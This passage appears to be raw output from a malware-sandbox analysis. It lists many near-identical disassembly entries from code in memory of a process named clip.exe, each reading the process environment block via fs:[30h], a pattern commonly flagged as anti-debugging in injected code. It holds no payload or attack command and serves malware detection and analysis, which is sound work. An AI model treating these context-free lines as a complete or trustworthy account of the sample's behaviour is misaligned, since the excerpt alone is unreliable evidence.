          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_043906F1 mov eax, dword ptr fs:[00000030h]22_2_043906F1
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_043906F1 mov eax, dword ptr fs:[00000030h]22_2_043906F1
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_0438E6F2 mov eax, dword ptr fs:[00000030h]22_2_0438E6F2
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_0438E6F2 mov eax, dword ptr fs:[00000030h]22_2_0438E6F2
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_0438E6F2 mov eax, dword ptr fs:[00000030h]22_2_0438E6F2
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_0438E6F2 mov eax, dword ptr fs:[00000030h]22_2_0438E6F2
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_043CD6F0 mov eax, dword ptr fs:[00000030h]22_2_043CD6F0
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_0433D6E0 mov eax, dword ptr fs:[00000030h]22_2_0433D6E0
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_0433D6E0 mov eax, dword ptr fs:[00000030h]22_2_0433D6E0
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_043A36EE mov eax, dword ptr fs:[00000030h]22_2_043A36EE
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_043A36EE mov eax, dword ptr fs:[00000030h]22_2_043A36EE
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_043A36EE mov eax, dword ptr fs:[00000030h]22_2_043A36EE
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_043A36EE mov eax, dword ptr fs:[00000030h]22_2_043A36EE
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_043A36EE mov eax, dword ptr fs:[00000030h]22_2_043A36EE
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_043A36EE mov eax, dword ptr fs:[00000030h]22_2_043A36EE
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_043436EF mov eax, dword ptr fs:[00000030h]22_2_043436EF
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_0431B6C0 mov eax, dword ptr fs:[00000030h]22_2_0431B6C0
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_0431B6C0 mov eax, dword ptr fs:[00000030h]22_2_0431B6C0
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_0431B6C0 mov eax, dword ptr fs:[00000030h]22_2_0431B6C0
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_0431B6C0 mov eax, dword ptr fs:[00000030h]22_2_0431B6C0
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_0431B6C0 mov eax, dword ptr fs:[00000030h]22_2_0431B6C0
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_0431B6C0 mov eax, dword ptr fs:[00000030h]22_2_0431B6C0
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_043D16CC mov eax, dword ptr fs:[00000030h]22_2_043D16CC
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_043D16CC mov eax, dword ptr fs:[00000030h]22_2_043D16CC
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_043D16CC mov eax, dword ptr fs:[00000030h]22_2_043D16CC
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_043D16CC mov eax, dword ptr fs:[00000030h]22_2_043D16CC
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_0434A6C7 mov ebx, dword ptr fs:[00000030h]22_2_0434A6C7
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_0434A6C7 mov eax, dword ptr fs:[00000030h]22_2_0434A6C7
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_043CF6C7 mov eax, dword ptr fs:[00000030h]22_2_043CF6C7
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_043416CF mov eax, dword ptr fs:[00000030h]22_2_043416CF
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_04309730 mov eax, dword ptr fs:[00000030h]22_2_04309730
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_04309730 mov eax, dword ptr fs:[00000030h]22_2_04309730
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_04345734 mov eax, dword ptr fs:[00000030h]22_2_04345734
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_043EB73C mov eax, dword ptr fs:[00000030h]22_2_043EB73C
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_043EB73C mov eax, dword ptr fs:[00000030h]22_2_043EB73C
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_043EB73C mov eax, dword ptr fs:[00000030h]22_2_043EB73C
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_043EB73C mov eax, dword ptr fs:[00000030h]22_2_043EB73C
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_0434273C mov eax, dword ptr fs:[00000030h]22_2_0434273C
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_0434273C mov ecx, dword ptr fs:[00000030h]22_2_0434273C
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_0434273C mov eax, dword ptr fs:[00000030h]22_2_0434273C
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_0438C730 mov eax, dword ptr fs:[00000030h]22_2_0438C730
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_0431973A mov eax, dword ptr fs:[00000030h]22_2_0431973A
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_0431973A mov eax, dword ptr fs:[00000030h]22_2_0431973A
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_04313720 mov eax, dword ptr fs:[00000030h]22_2_04313720
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_0432F720 mov eax, dword ptr fs:[00000030h]22_2_0432F720
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_0432F720 mov eax, dword ptr fs:[00000030h]22_2_0432F720
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_0432F720 mov eax, dword ptr fs:[00000030h]22_2_0432F720
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_043CF72E mov eax, dword ptr fs:[00000030h]22_2_043CF72E
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_0434C720 mov eax, dword ptr fs:[00000030h]22_2_0434C720
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_0434C720 mov eax, dword ptr fs:[00000030h]22_2_0434C720
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_043D972B mov eax, dword ptr fs:[00000030h]22_2_043D972B
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_04310710 mov eax, dword ptr fs:[00000030h]22_2_04310710
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_04340710 mov eax, dword ptr fs:[00000030h]22_2_04340710
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_0434F71F mov eax, dword ptr fs:[00000030h]22_2_0434F71F
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_0434F71F mov eax, dword ptr fs:[00000030h]22_2_0434F71F
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_04317703 mov eax, dword ptr fs:[00000030h]22_2_04317703
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_04315702 mov eax, dword ptr fs:[00000030h]22_2_04315702
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_04315702 mov eax, dword ptr fs:[00000030h]22_2_04315702
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_0434C700 mov eax, dword ptr fs:[00000030h]22_2_0434C700
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_04318770 mov eax, dword ptr fs:[00000030h]22_2_04318770
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_04320770 mov eax, dword ptr fs:[00000030h]22_2_04320770
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_04320770 mov eax, dword ptr fs:[00000030h]22_2_04320770
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_04320770 mov eax, dword ptr fs:[00000030h]22_2_04320770
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_04320770 mov eax, dword ptr fs:[00000030h]22_2_04320770
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_04320770 mov eax, dword ptr fs:[00000030h]22_2_04320770
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_04320770 mov eax, dword ptr fs:[00000030h]22_2_04320770
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_04320770 mov eax, dword ptr fs:[00000030h]22_2_04320770
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_04320770 mov eax, dword ptr fs:[00000030h]22_2_04320770
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_04320770 mov eax, dword ptr fs:[00000030h]22_2_04320770
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_04320770 mov eax, dword ptr fs:[00000030h]22_2_04320770
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_04320770 mov eax, dword ptr fs:[00000030h]22_2_04320770
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_04320770 mov eax, dword ptr fs:[00000030h]22_2_04320770
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_0430B765 mov eax, dword ptr fs:[00000030h]22_2_0430B765
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_0430B765 mov eax, dword ptr fs:[00000030h]22_2_0430B765
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_0430B765 mov eax, dword ptr fs:[00000030h]22_2_0430B765
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_0430B765 mov eax, dword ptr fs:[00000030h]22_2_0430B765
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_04310750 mov eax, dword ptr fs:[00000030h]22_2_04310750
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_0439E75D mov eax, dword ptr fs:[00000030h]22_2_0439E75D
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_04352750 mov eax, dword ptr fs:[00000030h]22_2_04352750
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_04352750 mov eax, dword ptr fs:[00000030h]22_2_04352750
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_04394755 mov eax, dword ptr fs:[00000030h]22_2_04394755
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_04323740 mov eax, dword ptr fs:[00000030h]22_2_04323740
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_04323740 mov eax, dword ptr fs:[00000030h]22_2_04323740
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_04323740 mov eax, dword ptr fs:[00000030h]22_2_04323740
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_043E3749 mov eax, dword ptr fs:[00000030h]22_2_043E3749
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_0434674D mov esi, dword ptr fs:[00000030h]22_2_0434674D
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_0434674D mov eax, dword ptr fs:[00000030h]22_2_0434674D
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_0434674D mov eax, dword ptr fs:[00000030h]22_2_0434674D
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_0433D7B0 mov eax, dword ptr fs:[00000030h]22_2_0433D7B0
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_043E37B6 mov eax, dword ptr fs:[00000030h]22_2_043E37B6
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_0430F7BA mov eax, dword ptr fs:[00000030h]22_2_0430F7BA
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_0430F7BA mov eax, dword ptr fs:[00000030h]22_2_0430F7BA
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_0430F7BA mov eax, dword ptr fs:[00000030h]22_2_0430F7BA
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_0430F7BA mov eax, dword ptr fs:[00000030h]22_2_0430F7BA
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_0430F7BA mov eax, dword ptr fs:[00000030h]22_2_0430F7BA
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_0430F7BA mov eax, dword ptr fs:[00000030h]22_2_0430F7BA
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_0430F7BA mov eax, dword ptr fs:[00000030h]22_2_0430F7BA
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_0430F7BA mov eax, dword ptr fs:[00000030h]22_2_0430F7BA
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_0430F7BA mov eax, dword ptr fs:[00000030h]22_2_0430F7BA
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_043997A9 mov eax, dword ptr fs:[00000030h]22_2_043997A9
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_0439F7AF mov eax, dword ptr fs:[00000030h]22_2_0439F7AF
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_0439F7AF mov eax, dword ptr fs:[00000030h]22_2_0439F7AF
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_0439F7AF mov eax, dword ptr fs:[00000030h]22_2_0439F7AF
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_0439F7AF mov eax, dword ptr fs:[00000030h]22_2_0439F7AF
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_0439F7AF mov eax, dword ptr fs:[00000030h]22_2_0439F7AF
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_043107AF mov eax, dword ptr fs:[00000030h]22_2_043107AF
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_043CF78A mov eax, dword ptr fs:[00000030h]22_2_043CF78A
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_043147FB mov eax, dword ptr fs:[00000030h]22_2_043147FB
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_043147FB mov eax, dword ptr fs:[00000030h]22_2_043147FB
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_0431D7E0 mov ecx, dword ptr fs:[00000030h]22_2_0431D7E0
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_0439E7E1 mov eax, dword ptr fs:[00000030h]22_2_0439E7E1
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_043327ED mov eax, dword ptr fs:[00000030h]22_2_043327ED
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_043327ED mov eax, dword ptr fs:[00000030h]22_2_043327ED
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_043327ED mov eax, dword ptr fs:[00000030h]22_2_043327ED
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_0431C7C0 mov eax, dword ptr fs:[00000030h]22_2_0431C7C0
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_043157C0 mov eax, dword ptr fs:[00000030h]22_2_043157C0
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_043157C0 mov eax, dword ptr fs:[00000030h]22_2_043157C0
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_043157C0 mov eax, dword ptr fs:[00000030h]22_2_043157C0
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_043907C3 mov eax, dword ptr fs:[00000030h]22_2_043907C3
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_043D903E mov eax, dword ptr fs:[00000030h]22_2_043D903E
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_043D903E mov eax, dword ptr fs:[00000030h]22_2_043D903E
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_043D903E mov eax, dword ptr fs:[00000030h]22_2_043D903E
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_043D903E mov eax, dword ptr fs:[00000030h]22_2_043D903E
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_0430A020 mov eax, dword ptr fs:[00000030h]22_2_0430A020
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_0430C020 mov eax, dword ptr fs:[00000030h]22_2_0430C020
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_0432E016 mov eax, dword ptr fs:[00000030h]22_2_0432E016
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_0432E016 mov eax, dword ptr fs:[00000030h]22_2_0432E016
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_0432E016 mov eax, dword ptr fs:[00000030h]22_2_0432E016
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_0432E016 mov eax, dword ptr fs:[00000030h]22_2_0432E016
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_04394000 mov ecx, dword ptr fs:[00000030h]22_2_04394000
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_0433C073 mov eax, dword ptr fs:[00000030h]22_2_0433C073
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_04321070 mov eax, dword ptr fs:[00000030h]22_2_04321070
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_04321070 mov ecx, dword ptr fs:[00000030h]22_2_04321070
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_04321070 mov eax, dword ptr fs:[00000030h]22_2_04321070
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_04321070 mov eax, dword ptr fs:[00000030h]22_2_04321070
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_04321070 mov eax, dword ptr fs:[00000030h]22_2_04321070
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_04321070 mov eax, dword ptr fs:[00000030h]22_2_04321070
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_04321070 mov eax, dword ptr fs:[00000030h]22_2_04321070
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_04321070 mov eax, dword ptr fs:[00000030h]22_2_04321070
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_04321070 mov eax, dword ptr fs:[00000030h]22_2_04321070
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_04321070 mov eax, dword ptr fs:[00000030h]22_2_04321070
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_04321070 mov eax, dword ptr fs:[00000030h]22_2_04321070
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_04321070 mov eax, dword ptr fs:[00000030h]22_2_04321070
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_04321070 mov eax, dword ptr fs:[00000030h]22_2_04321070
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_0438D070 mov ecx, dword ptr fs:[00000030h]22_2_0438D070
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_0439106E mov eax, dword ptr fs:[00000030h]22_2_0439106E
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_043E5060 mov eax, dword ptr fs:[00000030h]22_2_043E5060
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_04312050 mov eax, dword ptr fs:[00000030h]22_2_04312050
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_0433B052 mov eax, dword ptr fs:[00000030h]22_2_0433B052
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_043B705E mov ebx, dword ptr fs:[00000030h]22_2_043B705E
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_043B705E mov eax, dword ptr fs:[00000030h]22_2_043B705E
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_04396050 mov eax, dword ptr fs:[00000030h]22_2_04396050
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_043D60B8 mov eax, dword ptr fs:[00000030h]22_2_043D60B8
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_043D60B8 mov ecx, dword ptr fs:[00000030h]22_2_043D60B8
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_043A80A8 mov eax, dword ptr fs:[00000030h]22_2_043A80A8
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_0433D090 mov eax, dword ptr fs:[00000030h]22_2_0433D090
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_0433D090 mov eax, dword ptr fs:[00000030h]22_2_0433D090
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_04315096 mov eax, dword ptr fs:[00000030h]22_2_04315096
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_0434909C mov eax, dword ptr fs:[00000030h]22_2_0434909C
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_0439D080 mov eax, dword ptr fs:[00000030h]22_2_0439D080
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_0439D080 mov eax, dword ptr fs:[00000030h]22_2_0439D080
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_0431208A mov eax, dword ptr fs:[00000030h]22_2_0431208A
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_0430D08D mov eax, dword ptr fs:[00000030h]22_2_0430D08D
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_0430C0F0 mov eax, dword ptr fs:[00000030h]22_2_0430C0F0
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_043520F0 mov ecx, dword ptr fs:[00000030h]22_2_043520F0
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_0430A0E3 mov ecx, dword ptr fs:[00000030h]22_2_0430A0E3
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_043350E4 mov eax, dword ptr fs:[00000030h]22_2_043350E4
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_043350E4 mov ecx, dword ptr fs:[00000030h]22_2_043350E4
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_043180E9 mov eax, dword ptr fs:[00000030h]22_2_043180E9
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_043960E0 mov eax, dword ptr fs:[00000030h]22_2_043960E0
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_043920DE mov eax, dword ptr fs:[00000030h]22_2_043920DE
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_043E50D9 mov eax, dword ptr fs:[00000030h]22_2_043E50D9
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_043390DB mov eax, dword ptr fs:[00000030h]22_2_043390DB
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_043270C0 mov eax, dword ptr fs:[00000030h]22_2_043270C0
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_043270C0 mov ecx, dword ptr fs:[00000030h]22_2_043270C0
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_043270C0 mov ecx, dword ptr fs:[00000030h]22_2_043270C0
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_043270C0 mov eax, dword ptr fs:[00000030h]22_2_043270C0
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_043270C0 mov ecx, dword ptr fs:[00000030h]22_2_043270C0
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_043270C0 mov ecx, dword ptr fs:[00000030h]22_2_043270C0
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_043270C0 mov eax, dword ptr fs:[00000030h]22_2_043270C0
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_043270C0 mov eax, dword ptr fs:[00000030h]22_2_043270C0
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_043270C0 mov eax, dword ptr fs:[00000030h]22_2_043270C0
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_043270C0 mov eax, dword ptr fs:[00000030h]22_2_043270C0
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_043270C0 mov eax, dword ptr fs:[00000030h]22_2_043270C0
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_043270C0 mov eax, dword ptr fs:[00000030h]22_2_043270C0
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_043270C0 mov eax, dword ptr fs:[00000030h]22_2_043270C0
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_043270C0 mov eax, dword ptr fs:[00000030h]22_2_043270C0
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_043270C0 mov eax, dword ptr fs:[00000030h]22_2_043270C0
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_043270C0 mov eax, dword ptr fs:[00000030h]22_2_043270C0
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_043270C0 mov eax, dword ptr fs:[00000030h]22_2_043270C0
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_043270C0 mov eax, dword ptr fs:[00000030h]22_2_043270C0
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_0438D0C0 mov eax, dword ptr fs:[00000030h]22_2_0438D0C0
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_0438D0C0 mov eax, dword ptr fs:[00000030h]22_2_0438D0C0
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_04311131 mov eax, dword ptr fs:[00000030h]22_2_04311131
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_04311131 mov eax, dword ptr fs:[00000030h]22_2_04311131
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_0430B136 mov eax, dword ptr fs:[00000030h]22_2_0430B136
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_0430B136 mov eax, dword ptr fs:[00000030h]22_2_0430B136
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_0430B136 mov eax, dword ptr fs:[00000030h]22_2_0430B136
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_0430B136 mov eax, dword ptr fs:[00000030h]22_2_0430B136
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_04340124 mov eax, dword ptr fs:[00000030h]22_2_04340124
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_043BA118 mov ecx, dword ptr fs:[00000030h]22_2_043BA118
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_043BA118 mov eax, dword ptr fs:[00000030h]22_2_043BA118
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_043BA118 mov eax, dword ptr fs:[00000030h]22_2_043BA118
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_043BA118 mov eax, dword ptr fs:[00000030h]22_2_043BA118
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_043D0115 mov eax, dword ptr fs:[00000030h]22_2_043D0115
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_0430F172 mov eax, dword ptr fs:[00000030h]22_2_0430F172
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_0430F172 mov eax, dword ptr fs:[00000030h]22_2_0430F172
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_0430F172 mov eax, dword ptr fs:[00000030h]22_2_0430F172
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_0430F172 mov eax, dword ptr fs:[00000030h]22_2_0430F172
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_0430F172 mov eax, dword ptr fs:[00000030h]22_2_0430F172
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_0430F172 mov eax, dword ptr fs:[00000030h]22_2_0430F172
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_0430F172 mov eax, dword ptr fs:[00000030h]22_2_0430F172
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_0430F172 mov eax, dword ptr fs:[00000030h]22_2_0430F172
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_0430F172 mov eax, dword ptr fs:[00000030h]22_2_0430F172
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_0430F172 mov eax, dword ptr fs:[00000030h]22_2_0430F172
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_0430F172 mov eax, dword ptr fs:[00000030h]22_2_0430F172
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_0430F172 mov eax, dword ptr fs:[00000030h]22_2_0430F172
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_0430F172 mov eax, dword ptr fs:[00000030h]22_2_0430F172
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_0430F172 mov eax, dword ptr fs:[00000030h]22_2_0430F172
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_0430F172 mov eax, dword ptr fs:[00000030h]22_2_0430F172
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_0430F172 mov eax, dword ptr fs:[00000030h]22_2_0430F172
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_0430F172 mov eax, dword ptr fs:[00000030h]22_2_0430F172
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_0430F172 mov eax, dword ptr fs:[00000030h]22_2_0430F172
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_0430F172 mov eax, dword ptr fs:[00000030h]22_2_0430F172
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_0430F172 mov eax, dword ptr fs:[00000030h]22_2_0430F172
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_0430F172 mov eax, dword ptr fs:[00000030h]22_2_0430F172
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_043A9179 mov eax, dword ptr fs:[00000030h]22_2_043A9179
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_043A8158 mov eax, dword ptr fs:[00000030h]22_2_043A8158
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_04317152 mov eax, dword ptr fs:[00000030h]22_2_04317152
